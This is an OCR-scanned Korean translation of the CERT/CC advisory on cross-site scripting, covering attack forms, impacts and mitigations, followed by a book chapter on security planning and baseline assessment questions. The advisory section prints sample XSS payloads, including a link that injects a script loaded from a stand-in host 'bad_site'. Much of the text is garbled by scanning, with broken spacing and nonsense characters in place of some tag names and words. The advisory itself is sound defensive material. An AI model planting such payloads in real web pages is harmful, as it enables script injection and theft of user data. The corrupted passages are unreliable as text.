하는 기능들을 가지고 있다. 이 러한 스크립트들은 여 러가지 스크립트작성언어로 씌여 져 의 
뢰기의 열람기들에 의하여 실행된다. 설치된 대부분의 열람기들에는 기정값으로 된 설정된 
스크립트실행능력이 있다. 

한 의뢰기로부터 다른 의뢰기로 보내는 악성코드 

Web 대 면부를 가지고 토론그룹을 운영하는 싸이트들은 한 의뢰기 가 다른 의뢰기 에 보내 
는 통보문에 악성 HTML 태 그를 포함시키 는것 과 같이 취 약점 을 가지 지 않도록 오랜 기 간 보호 
대책을 취해 왔다. 실례로 공격자는 다음과 갈은 통보문을 보낼수 있다. 


Hello message board. This is a message. 
<SCRIPT> malicious code </SCRIPT> 
This is the end of my message. 


열람기에서 실행가능으로 된 스크립트들을 받은 피해자가 이 통보문을 읽어 보는 순간 
그 악성코드는 예견치 않게 실행될수 있다. 이런 식으로 포함된 스크립트작성래그들에는 <SC 
RIPT> ， <OBJECT> ， <APPLET> ， 〈EMBED〉 가 있다. 

의뢰기들사이의 통신::이 봉사기를 거처서 진행될 때 입력자료가 다른 사용자들에게 보내 
여 지면 싸이트개발자들은 그 입력자료가 믿지 못할것이라는것을 명백히 알아차리게 된다. 
대부분의 토론그룹봉사기들은 이리한 입력을 접수하지 않든가 혹은 그것을 코드화/려과한 후 
에야 다른 의뢰기들에 넘긴다. 


한 의뢰기가 실수하여 자기에게 다시 보내는 악성코드 

한 의뢰기가 악성코드를 보내는데 그것이 자기에게 다시 와서 사용될수 있다는 가능성 
에 대해서는 많은 인터네트 Web 싸이트들이 보지 못하고 있다. 이것은 쉽게 생길수 있는 실수 
이 다. 그렇 다면 왜 한 사용자는 자기 가 볼 악성 코드를 입 력하겠는가. 

그러나 그 사용자가 신뢰성 없는 정보원천에 기초하여 청구서를 제출할 때에는 이런 경 
우가 생기는 법이다. 실례로 공격자는 다음과 같은 악성코드를 구축할수 있다. 


<A HREF= "http://example.com/comment.cgi? 
mydocument=<SCRIPT> malicious code </SCRIPT>” > click 
here </A> 


436 



어떤 사용자가 무심히 이 련결을 딸깍하면 example.com 으로 보낸 URL 에 악성코드가 포 
함된다. 만일 Web 봉사기가 mydocument 의 값을 포함하여 한 폐지를 그 사용자에게 보내는 경 
우 그 의뢰기에서 그 악성코드가 예상치 않게 실행될수 있다. 이런 경우는 전자우편통보문이 
나 올스그룹통보문에 붙어 있는 신뢰성없는 련결점 들에서도 일어 난다. 


기 타 래그들의 악용 

스트립 트작성 래 그뿐아니 라 <1쎈묘]년>래 그와 같은 HTML 태,寒;意 •署격 자가 악용할 가능 
성이 있다. 실례로 악성 <1切묘1네>래그를 정확한 곳에 넣음으로써 공격자는 사용자들을 속 
여 현존양식의 행 동방식 을 수정케 하여 기 밀정 보를 루설시키 게 할수 있다. 기 타 HTML 래 
그들도 악용하면 페 지모양을 달러 할수도 있고 바라지 도 않거 나 기 분에 거 슬러는 영 상이 
나 음성 을 삽입할수도 있고 페 지 의 기 존모습이 나 행 동방식 을 다른 방법 으로 방해 를 놓을 
수도 있 게 된다. 

신뢰 성 악용 

주되는 신뢰악용에서 기 본적 인것 은 example.com 싸이트의 보안환경내 에서 《주입 된》 
.호크립 트나 HTML 이 기 동케 함으로써 신뢰 성 을 다 훼 손시키 는것 이 다. 신뢰 성있 다는 싸이 
트이므로 열람기사용자들이 믿음을 가지고 방문하고 거래 하고 싶어 하다가 문제가 제기되 
는것이다. 또한 합법적인 봉사기싸이트 example.com 의 보안방책도 짐작컨데 금이 간 방책 
일 수 있다. 

다음의 실례는 두개의 싸이트가 개입되였다는것을 명백히 보여 준다. 


<A HREF= http://example.com/comment.cgi? 
mydocument=SCRIPT SRC= ‘http://bad_site/badfile’ ><J 
SCRIPT〉” > click here </A> 

생어나厂^래그안에 있는 SRC 속성 이 비 법원천 (bad-site) 에서 오는 코드를 명백 히 내포하 
m 있다는것을 류의해야 한다. 앞에서 언급한 두 실례들은 다음의 스크립트작성보안모형에서 
근본적 인 동일원천출발방책 이 위 반되 였음을 보여 준다. 

• Netscape Communicator 동일원천방책 

• Microsoft Scriptlet 보안 

한 원천이 다른 원천에서 받은 페지에 코드를 주입해 넣는것으로 하여 이 취약성도 역 
시 싸이트간 스크립링 이라고 부론다. 

본정 황보고가 발표될 때 까지 이 취 약성 을 교묘하게 리용한 사건들이 CERT/CC 에 보고된 
적은 없었다. 그러나 이 취약성을 리용할 위험성은 있으므로 우리는 각 기관들의 정보총괄책 
임자들, 리사들，체계행정관리자들에게 이 문건의 해결책부분에 지적된 조치들을 무조건 강행 
할것 을 권고하는바이다. 해 당한 기 술기 관들，운영 기 관들，사법 기 관들에 기 술적 의 견을 적 극 제 
기하기를 바란다. 
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II . 영향 


사용자들이 Web 폐 지 , 우편통보문，뉴스그룹알림문들에 있는 신뢰 성없는 련결점 들을 따 
라 가는 경우 공격자가 써넣은 스크립트들이 예견치 않게 실행될수 있다. 또한 다른 사용자 
가 제공한 내용에 기초한 동적으로 생성된 폐지들을 보는 경우 악성스크립트들이 사용자 
모르게 실행될수도 있다. 

악성스크립트들이 마치도 사용자가 목적했던 싸이트에서 온것처럼 보이는 상태에서 실 
행되기때문에 공격자는 검색된 문건에 대한(공격자가 쓰는 기술에 따라) 완전한 접근을 가지 
며 폐지에 포함되여 있는 자료들을 원래싸이트에 돌려 보낼수도 있다. 실례로 악성스크립트 
는 실지의 봉사기가 제공한 양식에 있는 마당들을 읽은 다음 이 자료를 공격자에게 보낼수 
있 다. 

문서객 체모형 (DOM) 에 대 하여 공격 자가 어 느 정도로 접근하는가 하는것은 그 공격 자가 
선택한 언어의 보안구조에 달려 있다. 구체적으로 보면 JavaApplet 들을 가지고는 공격자가 D 
0M 에 접근할수 없다. 

또한 공격 자는 합법 적 Web 봉사기 와의 보충적 인 교제 를 피 해 자가 모르게 진행하는 스크 
립 트도 삽입할수 있다. 실례로 공격 자는 교묘한 수를 개 발하여 합법적 Web 봉사기의 다른 폐지 
에 자료를 투고하였 다. 또한 피 해 자의 Web 열 람기 가 스크립링 을 지 원 하지 않는다고 하여 도 공 
격자는 폐지의 모양새를 고치거나 그 행동방식을 수정하거나 기타 방법으로 정상적인 운영을 
방해할수도 있 다. 

구체 적 인 영 향은 공격 자가 선택하여 리 용하는 언어 와 공격 을 받게 되 는 해 당 합법 적 페 
지의 설정값들에 따라 크게 달라 질수 있다. 인차 발견하기 힘든 일부 경우들을 보면 다음과 
같다. 

SSL 암호접속이 로출될수 있다. 

안전소케트층 (SSL) 암호화접속이 의뢰기와 봉사기사이에 이루어 지기전에 악성스크립트 
태그가 들어 간다. SSL 은 이 선로로 보내여 지는 자료를 악성코드至 포함하여 암호화하며 이 
것은 두 방향으로 보내여 진다. 의뢰기와 봉사기사이의 통신을 누가 훔치지 않는다고 보면서 
SSL 은 전송된 자료의 합법성을 확인하려고 하지 않는다. 

의뢰기와 봉사기사이에 실지 합법적인 대화를 하므로 SSL 은 그어떤 문제점에 대한 보 
고도 하지 않는다. 비 SSL URL 에 접속하려는 악성코드는 불안전한 접속에 대 하여 경고문을 
발생 시킬수도 있으나 공격 자는 SSL 능력 이 있는 Web 봉사기 를 가동시 킴 으로써 이 경 고가 나오 
지 않게 할수 있다. 

무키조작을 통하여 공격 이 지 속될 수 있 다. 

합법적 Web 싸이트에서 온 악성코드가 일단 실행되고 있으면 쿠키가 조작되여 공격이 지 
속될수 있 다. 구체 적 으로 보면 만일 취 약성 이 있는 Web 싸이 트가 폐 지 들을 동적 으로 생 성하는 
데서 쿠키로부터 온 마당을 리용한다면 공격자는 그 쿠키를 조작하여 거기에 악성코드를 포 
함시킬수 있다. 그러면 그 쿠키를 그 싸이트가 요구하여 거기에 있는 악성코드를 포함한 마 
당을 가전 폐지 를 현시하는 경우 그 Web 싸이트를 계속 방문하게 되 면 많은 손해 를 가져 올 
수 있다. 
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공격 자가 의뢰기로부터 제 한성 Web 싸이트에 접근할수 있다. 

공격자는 악성 URL 을 만들어 어느 한 의뢰기콤퓨터상에서 스크립트코드를 실행시킬수 
있다. 이때 그 콤퓨터는 자기가 속한 인트라네트에 있는 어떠한 취약한 봉사기로부터 자료를 
꺼낼수 있는 콤퓨터이다. 

공격 자는 타개된 그 의뢰기 가 인트라네트 Web 봉사기 에 대 하여 인증되 였으면 그 봉사기 
에 비 법 Web 접근을 할수 있게 된다. 공격 자가 그 어떤 특정한 체계로 가장할 필요도 없다. 
공격자는 다만 취약성이 있는 인트라네트봉사기만 알아 내고 그 인트라네트봉사기에 있는 
기밀자료를 꺼낼수 있는 무심히 보이는 어느 한 폐지를 사용자가 방문하도록 설유하기만 하 
면 된다. 

령역위주의 보안방책이 위반될수 있다. 

사용자의 열 람기 가 일부 호스트나 령역 에서 오는 스크립 트작성언어 들이 실행되 게 하면 
서효 히런 특권을 남들이 가지지 못하게끔 설정되였다면 공격자들은 이것을 리용할수 있다. 

공격자는 스크립트실행능력이 있는 봉사기에 보내는 요구신호에 악성스크립트태그들을 
삽입함으로써 자기모 이러한 특권적접근을 가지게 된다. 실례로 Internet Explorer 의 보안《지 
대》들이 이 기법에 의하여 전복될수 있다. 

흔히 쓰지 않은 문자모임올 사용하면 추가적인 위험이 있을수 있다. 

Web 봉사기가 돌려 보낸 폐지에 문자모임이 지정되지 않은 경우 열람기는 자기가 받숀.. 
정보를 사용자가 지정한 문자모임 으로 해석한다. 그러 나 많은 Web 싸이트들은 (ISO-8859-1 에 
있는 특수한 의미를 가전 문자들을 코드화하거나 려과하는 경우에조차)문자모임을 명백히 
지정해 주지 못하여 자기의 문자모임을 쓰는 사용자들을 위험 에 빠뜨리게 된다. 

공격 자는 양식 들의 행 동방식올 고쳐 놓을수 있 다. 

어떤 조건하에서 공격자는 결과를 제출하는 방식을 비롯한 양식들의 행동방식을 수정할 
수도 있을것이다. 

m. 해결방도 

사용자가 알아야 할 해결방도 

Web 사용자들이 취할수 있는 해결방도에는 완성된 해결방도란 하나도 없다. 이 런 류형의 
문제 점 들을 없애 기 위 해서 는 Web 페 지개 발자들이 자기 들이 만드는 폐 지 들을 수정하는것 이 
기본이다. 

그러 나 Web 사용자들이 이 러한 공격들을 받지 않게 하려면 두가지 기본적 인 선택안들이 
있다. 첫째 안인 열 람기 에서 스크립트작성 언어 를 기능정지 (disable) 시 키 는것 이 가장 좋은 보호 
대책이나 일부 중요한 기능들을 정지시킴으로써 부정적작용이 있게 된다. 사용자들은 위험을 
최 소수준으로 유지해 야 할 필요성 이 있는 경 우에 만 이 선택 항목들을 설정 하여 쓸수 있 다. 

두번째 안 즉 처 음으로 방문하는 Web 싸이 트들泰 어 떤 방법 으로 방문하겠는가를 선정 해 
주는것은 기능들을 정지시킴이 없어策 위험을 훨씬 약화시킬수 있다. 여기서 사용자들이 알 
아야 할것은 이 경우 더 많은 위 험요소들이 있으나 그렇게 설정하는것은 중요한 기능들을 보 
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존리 용하기 위 해서 라는것 이 다. 

그렇지만 이 두가지 해결안들사이의 위험상차이를 량적으로 측정하기는 불가능하다. 
.寒크립트언어의 실행가능 (enabled) 상태로 열람기를 계속 쓰러는 사용자들은 정기적으로 
CERT/CC 의 Web 싸이트들을 재방문하여 갱신판을 받아야 할뿐아니라 이러한 위험성이나 
위협요소들이 얼마나 증가하는가에 대하여 다른 보안정보원천들도 조회하여 알아야 할 
것 이 다. 

Web 사용자는 열람기의 스크립트언어의 기능을 정지시켜야 한다. 

이 취 약성 을 교묘하게 리 용하여 코드를 실행 시 키 자면 일정한 형 래의 삽입 된 스크립 트언 
어가 피해자의 열람기에서 실행가눙으로 설정되여야 한다. 모든 스크립트언어들을 실행불가 
능하게 하면 이 취약점의 가장 중요한 영향이 제거될수 있다. 

그렇 지 만 공격 자들이 다른 HTML 래그들을 URL 에 삽입하는 방법 으로 합법 적 싸이트에 
의하여 제공되는 내용의 모습에 영향을 줄令툐 S 다는것을 알아야 한다. 스크립트언어를 실 
행불가능하게 하여[_포 신0_>래그의 악성사용은 막지 못한다. 

당신의 열람기에서 스크립트언어를 실행불가능하게 하는 구체적인 지시사항들은 우리의 
Malicious Code FAQ (악성 코드 질 문봉사)에 서 받아 볼수 있 다(홈폐 지주소: http://www.cert.Org/t 
ech-tips/malicious-code-FAQ.html). 

Web 사용자는 무질서한 열 람을 하지 말아야 한다. 

일부 사용자들은 스크립트먼어를 완전히 실행불가능하게 할풀 모르거나 그렇게 하려 하 
지 않는다 . 이 스크립트실행불가능이 가장 효과적 인 방안이기는 하지만 일련의 기법들을 리 
용하면 사용자가 이러한 취약성에 빠지는것을 줄일수 있다. 

싸이트간 스크립링 이 가장 위 험한것 이 므로 사용자들은 해 당 Web 싸이트의 첫방문을 
잘 가려 서 선정 하면 일정한 보호상태 를 얻 을수 있 다. 열 람에 직 접 주소를 타자쳐 넣 는것 
(혹은 안전하게 보관된 현지 북마크 (bookmark) 를 리용하든가)은 싸이트접 속의 가장 안전한 
방도이 다. 

중요치 않은 싸이트들에 접근하는 경우에도 그 망의 다른 국부체계들에도 접근할수 있 
는데 그런 경우는 의뢰기체계가 방화벽뒤에 위치하고 있는 경우 혹은 그 의뢰기가 다른 Web 
봉사기(례를 들면 인트라네트의 봉사기)들에 접근할수 있는 신원내용들을 캐쉬에 보관하였던 
경 우들이 있 다. 그렇 기 때 문에 주의하여 Web 싸이 트들을 열 람하는것 은 스크립 트실 행 불가능보 
다 못하다. 

스크립트가 실행가능으로 선택된 경우 눈으로 련결점들을 조사해 보아도 악성련결점을 
따라 가지 않을수가 없다. 그것은 공격자의 Web 싸이트가 사용자창에 나타나는 그 련결점들을 
허위적으로 대표하게 하는 스크립트를 리용하기때문이다. 실례로 Netscape 의 Goto 와 Status 띠 
의 내용들이 JavaScript 로 조종될수 있다. 

Web 페지개발자들과 Web 싸이트관리자들이 알아야 할 해결방도 

Web 폐지개 발자들은 동적 으로 생성되는 페지들올 재코드화하여 출력 을 확인해 야 한다. 

Web 싸이트관리자들과 개발자들은 자기들의 싸이트들이 이려한 취약성으로부터 산생되 




는 악용의 영향을 받지 않게 하려면 동적으로 생성되는 폐지들에 필요 없는 래그들이 포함되 
지 않도록 하여 야 한다. 

입력흐름에서 위험한 메타문자들을 제거해 버리려고 해도 많은 위험요소들이 처리되 
지 않은채로 남아 있게 된다. 우리는 폐지작성에 사용되는 변수들을 명백히 허용된 문자 
들로 제한시킬것과 출력폐지의 생성과정에 이 변수들을 검사해볼것을 개발자들에게 적극 
권고한다. 

또한 모든 동적생성 Web 폐지들에서 문자모임들을 해당한 값으로 명백히 정하여야 한다. 

자료의 코드화와 려과가 이 취약성을 해결하는데서 중요한 단계이며 또 복잡한 문제이 
므로 CERT/CC 는 이 문제 를 보다 구체 적 으로 해석한 다음의 주소에 있는 문건을 볼것을 권 
고한다. 


http://www.cert.org/tech_tips/malicious_code_imtigation.html 


Web 봉사기 관리 자들은 해 당 판매 업 체 에서 보강프로그람들을 구입하여 적 용해 야 한다. 

일부 Web 봉사기제품들에는 동적으로 생성되는 폐지들이 기정설정값으로 들어 있다. 만 
일 당신의 싸이트에 자체로 개발한 동적폐지들이 없다 하더라도 당신의 Web 봉사기는 여전히 
취 약하다. 실례 로 당신의 봉사기 가 생성 한 《404 Not Found》 폐지 에는 악성 래 그가 붙어 있 
을수 있다. 

이 문제 를 해결하자면 Web 봉사기 관리 자들은 자기의 해 당 판매 업체 가 제 기하는 보강프 
로그람들을 적용하여 야 한다. 부록 1에는 이 정황보고서를 위하여 판매업체들이 제공하는 정 
보들이 들어 있다. 더 많은 정보를 받는 차제로 우리는 이 부록을 갱신할것 이 다. 목록에서 당 
신의 판매업체의 이름이 없으면 CERT/CC 는 그 업체에서 정보를 받지 못한것으로 된다. 당신 
의 판매업체와 직접 련계를 가지라! 
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제 2 8 장. 확고한 보안: 새로운 보안세계질서 


켄 사우레트 


자신과 다른 사람들의 경험으로부터 배우는 자가 현자이다. 

우리의 미래는 과거와 현재 그리고 우리들의 지향의 반영이라고 말할수 있다. 과 
거는 우리에게 무엇을 지향하고 무엇을 해야 하며 무엇을 하지 말아야 하고 무엇을 
아직 모르는가 하는데 대한 지식과 지혜를 준다. 점괘나 볼줄 안다는 보안전문가들이 
과연 미래를 단순히 과거의 갱신된 재현으로 보겠는가. 미래의 기술과 회사，경쟁업 
체，제공업체，소비자들이 그 기술을 어떻게 리용할것인가를 예언한다는것은 거의 불 
가능하지만 오늘의 현실이 과거에 그려 보던것과 그렇게 현저하게 차이나지 않는다 
는것은 자명한 사실이다. 그러니 그것을 《예언》이라기 보다는 《계획》이라고 불러 
야 할것이다. 

표 28-1 기본제목들과 인용문들(과거) 


1981. 4. 20 주간 상업 :《 콤퓨터범 죄 -상업 활동에 위 험 증대》 

1985. 7. 7 텍싸華 뉴싼안또니오표명:《콤퓨터강도들 은행습격》 

1987. 2. 4 콤퓨터세계: 《범죄를 축출하라. 자료는 전략적자원이므로 MIS 는 이 귀 

중한 재산을 보호하는 방법을 알아야 한다.》 

1989.3 은행업 에서 콤퓨터 : 《 통과암호방위는 승용차가 주차할 때 열쇠 를 건사 

하는것과 마찬가지이다.》 

1990.2.12 콤퓨터세계: 《그리고 통과암호는 쓸모 없게 되였다. 기억된 콤퓨터통과 
암호가 시대에 뒤떨어 졌는가，극히 일부분의 콤퓨터과학자들과 보안전문가 
들은 그렇다고 생각한다.》 

1990.10.14 자치적인 영국 런던:《해커들 5개의 은행 략탈》 

1992.12 망관리:《전문가들 망보안이 호전되고 있지 못하다고 혹평》 


그것을 어떻게 부르든 상관없이 모든 분야의 전문가들은 무역잡지와 보안일지들에 
미 래의 정 보보안을 예측하는 기사들을 싣는다. 표 28_1에 여 러 무역잡지 들의 주요제 목 
과 인용문들을 실례로 주었다. 표 28 — 1의 주요제목들과 인용문들을 표 28 — 2에 준 최근 
몇년전의것들과 대비해 보라. 별로 의의 있는것은 아니지만 미래에 대한 예언자적견지에 
서 보면 표 28 — 1의 8년전 혹은 그 이 전의 기 사들이 표 28 — 2의 최 근 몇년전것 들과 큰 
차이 가 없다는것을 알수 있다. 실례 로 통과암호를 방어수단으로서 취급하는《 은행업 에 
서 콤퓨터》의 1989년기사를 보라. 거기에서는 승용차의 관건문제가 아니 라 바로 열쇠를 
쥐는 문제에 대하여 언급하고 있다.《개인용콤퓨터세계》의 2000년 6월호에서 전문가들 
은 통과암호시대가 끝나간다면 이라는 질문을 제기하고 있다. 이것이 10년정도 지나면 



다음과 같은 주제의 기사를 보게 되리라는것은 의미하겠는가. 《모든 사람을 위한 콤퓨 
터 잡지》2010년 최 신기 사， ( 생 체 계 측학，스마트카드 그리 고 지 난해 원시 적 통과암호인증 
법 을 종국적 으로 청 산한 두 요소인증법 은 DNA 및 유전검 사법 의 가격 인하에 의하여 사 
멸 단계》 

이 모든것 이 확고한 보안세 계의 건설과 무슨 관계 가 있는가. 어리석은자만이 같은 
실책 을 반복하는 법 이 다. 과거 에 대 한 리해 다시 말하여 무엇을 하였으며 하지 못한것은 
무엇인가 하는것을 연구조사한 기초우에서만 미래에 대한 정확한 표상을 공정하게 엄을 
수 있 다. 많은 회 사들이 메인프레 임방식 을 버 렸지만 보안우려 는 여 전히 없 어 지 지 않고 
있다. 사실 그 우려는 더 많은 곳으로《확산》되였을 뿐이다. 

표 28-2 기본제목들과 인용문들(현재) 


1996. 9. 23 주간 Web: 《싸이 버 은행 개 척 자들 보안투쟁 , 재 정 적 장벽》 

2000.12.7 AP: 《 세계적으로 싸이버범죄법결집，일부 나라들에서 법률을 갱신하기 

위한 기 초축성》 

2000.6.29 개인용콤퓨터세계: 《통과암호의 시대는 바야흐로 끝나 가는가. 앞으로 

통과암호와 PIN 번호를 기억할 필요가 더는 없을것이다.》 

2000.4.10 산업 표준: 《 공격 받는 상업，싸이 버 항의 단체 들 반회 사운동에 서 공격 과 

속임수법 새 로운 수준에 도달》 

2000.12.11 APBnews.com: 《 21살의 광신적 인 배 우희 망자가 헐 리 우드명 배 우모집 기 관 

의 Web 싸이트를 이른바 공격，기밀예능시험목록을 절취하여 인터네트상에 
서 전매한것 으로 하여 콤퓨터사기 및 절도죄 로 기 소》 

2000.12.22 콤퓨터세계: 《 …해커는 Egghead 회사의 보안장벽을 부셔버린다. …해커는 

회사가 신용카드번호들을 보관한 소비자자료기지가 들어 있는 콤퓨터체계 
에 가까스로 뚫고 들어 갔다.》 


보안전문가에 게 있어서 자료파피 ( destruction ), 자료로출 ( disclosure ), 자료리 용 ( use ), 
자료수정 ( modification )( DDUM ) 은 모두 매우 심각한 고려사항이다. 자료의 비밀성도 무 
결성，리용성과 함께 여전히 문제 이 다. 역시 중요한것은 자료의 적시성과 타당성 이다. 
Atomic Tangerine 의 퇴 역 고문 Donn B . Parker 는 자료의 복사본절취 가 자료의 가치를 극 
히 떨어 뜨리지만 원본자료의 무결성에는 큰 영향을 미치지 못한다고 하였다. 실례 로 
현재까지 팔리지 않은 무역비밀절도를 들수 있다. 소유자는 원본무역비밀을 여전히 가 
지 고 있지 만 그 정 보가 도난 당하여 공개되 였으므로 그 자료는 더 는 원래 와 같은 가치 
를 가질수 없게 된다. 얼마나 많은 회사들이 생산자료의 복사본을 검사환경에서 아직 
리용하고 있는가，생 산에 서 와 같은 보호가 그 검 사환경 에 제 공되 는가，생 산에 참가하였 
던 사람들만이 검사환경에서 그 자료에 접근할수 있는가. 자료의 원본복사본을 가지는 
것 만으로는 불충분하다. 만일 회 사의 수입산출자료와 갈은 시 간적 으로 요긴한 자료가 
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도난 당하여 주식구입이나 보도매체에 리용된다면 비록 무효하다 해도 그 자료는 변하 
지 않고 그대로 있는것으로 간주될수 있다. 필자는 이것이 반드시 CIA 구조를 무효화시 
키는것은 아니며 오히려 보강하는것이라고 주장한다. 그 자료가 도난 당하여 회사에 
해를 주고 좋은 기회를 잃게 할수 있다는 사실은 자료보호의 가치를 증대시키는것으로 
된 다. 

메인프레 임시대로부터 상당히 안전하고 안정된 시대 에 이르기까지는 20여년이 걸렸 
다. 의뢰기/봉사기방식이 나오고 일부 자료의 이동과 그의 처리가 사용자에게 더욱 접근 
하게 됨 에 따라 그와 같은 우려 와 새 로운 취 약점 들이 다시 나타나게 되 였 다. 메인프레 임 
시대를 공고히 한 그 20년간의 경험으로부터 배우지 않는다면 현존환경에서 그런 안정성 
을 수립 하는데 또 20년 이 걸 릴 것 이 다. 

확고한 보안세계의 기틀형성 


과거는 우리에게 어떤 교훈을 남기였는가，과거에 대한 분석과 무엇을 하였고 하지 
못한것은 무엇 인가를 고찰함으로써 사람들은 미 래의 보안구조들의 기틀을 형성해 나갈수 
있다. 그 기틀은 업무공정의 자체평가가 완성될 때 형성되기 시작한다. 이것은 회사의 업 
무공정조사，콤퓨터공정이 어떻게 그것의 효과성을 더 높이는가 그렇지 않은가，새 기술 
이 어디에서 생산성을 증대시키고 새로운 수익을 주는가 등으로 구성된다. TCMP 와 같 
은 새 로운 규약들과 인터네 트와 같은 기 술들이 프레 임 중계 (Frame Relay ), 메인프레 임 
(main frame ), SNA(System Network Architecture ) 망파 같은 통신매체들을 대신하고 있기때 
문에 차이는 있지만 초보적으로 다음과 같은 네가지 측면에서 자료보호가 여전히 필요하 
다. (1) 발생측면， (2) 보관(주기억，자료기지 혹은 다스크상의 파일，여 벌복사와 같이 오 
랜기간 보관하는 보관고에)， (3) 처 리(적용)측면， (4) 통과도중 또는 점 대 점 통신선로상 
에서 (망) 

그림 28 — 1을 참고로 하여 다음의 문제들을 고찰해 보자. 그림에서 동그라미안에 
든 수자들에 따라 론의 를 진행한다. 업 무공정 과 통제 를 비 롯한 회 사의 콤퓨터처 리 환 
경에 대한 첫 기준평가를 진행함으로써 회사는 자기의 보안세계를 옳게 구축할수 있 
는 비방으로 되는 구성요소들을 가지게 될것이다. 이 기준평가 (1) 을 실현하는 방법은 
회사보안태세의 기준을 도출하기 위한 여러가지의 기초질문들을 제기(표 28-3 참고) 
하는것 이 다. 기 초질 문들을 완성하면 회 사는 그 기 초요구가 회 사의 정 보자산과 업 무처 
리환경 에 대 한 모든 위 험 요소들과 로출점 들을 충분히 반영 하고 있는가를 곧 평 가할수 
있다. 이것은 조사결과를 문서화하고 업무처리환경과 로출점들을 최소화할수 있는보 
안운영계획을 세울수 있도륵 간명한 기준보안보고서 (2) 를 제출하는것으로써 달성될수 
있 다. 

주의 초기기준평 가는 보다 본격 적 인《위험 요소 또는 보안평 가 및 분석》의 간략판 
이 다. 자기 회 사의 보안이 보기 와는 달리 괜 찮다고 오판되 지 않도록 주의하라. 그 평 가는 
기초질문에 대 답하는 사람들의 정 직성과 지식 그리고 그 대답을 해석하는 사람들의 경험 









표 28-3 


회사보안태세의 기준평가 


1. 회 사의 방책 들이 명 백 하고 옳바른 전자우편사적 비밀방책 이 나 인터 네트리용방책 과 같은것 들을 
준수하여 회 사자원의 업무적 리 용문제를 취 급하도록 정의되 는가，그것들이 시종일 관하게 실시 
되는가 아니면 전혀 그렇지 않은가. 

2. 회사의 조직체계가 알려 진 해킹취약점들의 로출을 방지하도록 가장 최신의 보안보강프로그 
람들로 갱신되는가, 회사의 체계에 접근하는데 어떤 취약점들이 악용될수 있는지 알고 있는가. 

3. 회사는 콤퓨터범죄를 탐지할 능력이 있으며 경영진은 어떻게 그 범죄가 감행되고 누가 그 범 
죄의 범인인가를 법정과 보도매체, 주주들에게 립증할만한 명백한 근거를 가지고 있는가. 

4. 회 사는 가정 또는 무선으로부터 의 원격접 속을 허 용하는가，종업 원들은 기 관 사무실 에 서 만 접 
속하는가，어 떤 방식 으로 종업 원들이 망에 접 근하는가，종업 원들이 원격접 근이 나 탁상형 콤퓨 
터상의 모뎀 과 같은 경 영 진이 알지 못하는 어 떤 방식 들로 접 근하지 않았는가. 

5. 회사망을 통하여 무엇이 전송되는가，극비 또는 기밀정보가 전송되지 않는가. 

6. 정보처 리보호대책 이 PBX 와 다른 전화회선을 통한 공격에 대한 보호에도 연장되는가. 

7. 《우발적사건》에 대한 정의가 있는가，우발적사건의 동기로 된 계획이 치명적사건을 초래하 
도록 작성되여 있지는 않는가，경영진은 법정에 내세울만한 명확한 증거를 대면서 그 사건을 
범죄로 기소할수 있는 능력을 키우려는 의향이 있는가. 

8. 련방법률이 어떻게 기업활동에 적용되는지 관찰되였는가. 

9. 모든 사용자들이 회사망을 사용할수 있도록 인증되고 권한이 있는가. 

10. 회사의 모든 입구점들이 알려 지고 문서화되는가，그것이 모뎀, 개 인인터네트접속，외부망접 
속 등과 갈은 기 술적 문제 로 하여 존재하는 문제 들을 포함하는가. 


보고서가 완성된후에 회사는 성공적인 보안계획작성의 첫째 문제 즉 경영진의 결심 
채 택 (3) 문제를 취급하여 야 한다. 기 관마다 경 영 진의 결심채 택기준을 매우 차이 나게 정한 
다. 재정적손실을 일으키는 사건으로 하여 필요한 물건들을 벌충으로 사들이기 쉽다거 나 
경영진이 모든 위험요소들을 알고 있지 못하므로 그렇게 하기 어렵다라는 식으로 기준보 
고서 에서 지적할수 있다. 업무구조에 그들을 인입시킴 으로써 경 영 진의 리해를 도모할수 
있다. 이 두 경우에 대처하여 경영진의 업무목적을 리해하고 보안우려에 대하여 경영진 
을 교육하는데 그림 28 — 1의 질 문들을 리용할수 있 다. 

경 영 진이 보안문제 를 최종적 으로 결정 하기전까지는 일 반사용자들이 보안방책，지 침， 
절 차를 우선시 하지 못할것 이 다. 보안문제 가 심 화되 면 최 고경 영자로부터 인사관리 자에 이 
르기 까지 기 관의 전반부서에 걸 쳐 경 영 진의 려 과시 설 을 설 치하는것 이 또한 중요하다. 

보안은 보험처 럼 일 종의 희 망을 안겨 준다는것 을 명 심하라. 보안은 보험 과 같이 위 
험으로 인하여 가지게 되는 우려를 최소로 줄인다. 회사는 기업을 위험에 몰아 넣는 모 
든 취약점과 련관된 위험인자들에 대하여 수수방관할 의사가 전혀 없기때문에 돈을 들여 
서라도 보안대책을 강구한다. 보안은 회사가 자기의 보안이 경쟁자보다 우세하다는것을 
보여 줄수 없는한 영 업수익성 을 증대시키지 못한다. 대부분의 회사들에서 보안은 수익을 
내지 못한다. 




보안은 업무비용에 속한다. 보안은 지출처럼 보이지만 업무의 필수비용으로 보아야 
한다. 오늘 자료의존성으로 하여 회사가 보안계측을 할수 있겠는가 하는것이 문제 인것이 
아니 라 그렇게 할수 없겠는가 하는것 이 문제 로 된다. 

다음은 보안계획의 산물에 돌려 지는 예산 (4) 인데 그것은 경영진에 대한 지속적인 
교육과 기 술평 가에 도움을 주며 보안기 틀축성 을 완성하는데 도움을 줄수 있는 보안전문 
가들이나 필요한 보안상담역들에 대한 적당한 로임을 포함한다. 예산은 또한 성공적인 
사업을 도모해 나갈 림에 제출되여야 한다. 그 림 (5) 를 보안기틀 또는 계획 (6) 을 세우고 
그것을 련속적 인 결심채택과 잠정적 인 추가예산요구를 위하여 경 영 진에 제출할것 이 다. 보 
안의 식 화과정 (15) 은 단순히 경 영 진에 게 보안구조와 자금요구를 알려 주기 위하여 이 시 
점에서 진행되기 시작한다. 이 과정을 더욱 형식화하고 보안의식화과정초기의 리점을 살 
려나감으로써 경 영 진을 시 종일 관하게 자각시 킬수 있 다. 보안의 식화과정 은 그 과정 이 형 
식화되 는가 안되 는가에 관계 없 이 보안과정 전기 간에 걸 쳐 요구된 다. 보안의 식화과정 에 서 
는 경 영 진이 중요성 을 인식 하고 보안에 대 한 지 속적 인 예 산지 원을 긍정하도록 그들에 게 
최 근 사건들과 법 률이 나 규정 들을 실례 를 들어 알려줄 필요가 있 다. 

계 획 에는 확고한 보안세 계 를 세우기 위한 활동들을 우선시 하는것을 포함시켜 야 한다. 
기관들에 따라 활동들을 우선시하고 지원체계를 수립(보안의식화과정을 통한 경영진의 
결심채 택)하도록 도와 주거 나 기 틀의 첨 가 또는 변경 을 확인하는데 공식 적 인 평 가 (7) 를 
